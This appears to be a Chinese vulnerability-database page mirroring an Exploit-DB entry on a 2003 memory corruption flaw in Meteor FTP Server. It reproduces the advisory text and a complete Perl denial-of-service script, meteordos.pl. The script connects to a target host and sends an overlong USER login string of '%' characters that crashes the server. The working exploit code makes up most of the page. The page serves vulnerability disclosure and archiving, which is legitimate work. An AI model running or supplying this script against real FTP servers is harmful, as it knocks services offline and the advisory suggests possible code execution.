Meteor FTP Server 1.2/1.5 – USER Memory Corruption

Meteor FTP Server 1.2/1.5 – USER Memory Corruption

漏洞ID 1054077 漏洞类型
发布时间 2003-08-08 更新时间 2003-08-08
图片[1]-Meteor FTP Server 1.2/1.5 – USER Memory Corruption-安全小百科CVE编号 N/A
图片[2]-Meteor FTP Server 1.2/1.5 – USER Memory Corruption-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22999
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8376/info

Meteor FTP Server is prone to a memory corruption vulnerability that can be triggered by a malicious client via an overly value for the FTP USER command. This could be exploited to cause a server crash.

Further reports indicate that this may likely also be exploited to execute arbitrary code in the context of the affected server.

#!/usr/bin/perl
#
# meteordos.pl - Remote denial of service against Meteor FTP Version 1.5
#
# A vulnerability has been identified in Meteor FTP Version 1.5, which
# allows malicious users to remotely crash the ftpd. By connecting to the 
# ftpd and issuing USER followed by large amounts of data, the server 
# crashes. For more info, go to : 
# http://www.evicted.org/projects/writings/mftpadvisory.txt
# 
# Usage : ./meteordos.pl <host/ip>
#
# Vulnerability & code by zerash
# Contact : [email protected]

use Net::FTP;
$host = $ARGV[0];

if("$ARGV[0]" eq "") {
	print("DoS against Meteor FTP Version 1.5 by [email protected]");
	die("Usage : ./meteorftpdos <host/ip>n");
} else {	
	
	print("Connecting to $host...n");
	my $ftp = Net::FTP->new($host) or die "Couldn't connect to $hostn";
	print("Connected!n");
	print("Attempting to exploit the ftpd...");
	$ftp->login('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%');
	$ftp->quit;
	print("Success!n");
}

相关推荐: Mirabilis ICQ 2002 – Sound Scheme Remote Configuration Modification

Mirabilis ICQ 2002 – Sound Scheme Remote Configuration Modification 漏洞ID 1053601 漏洞类型 发布时间 2002-07-15 更新时间 2002-07-15 CVE编号 N/A CN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享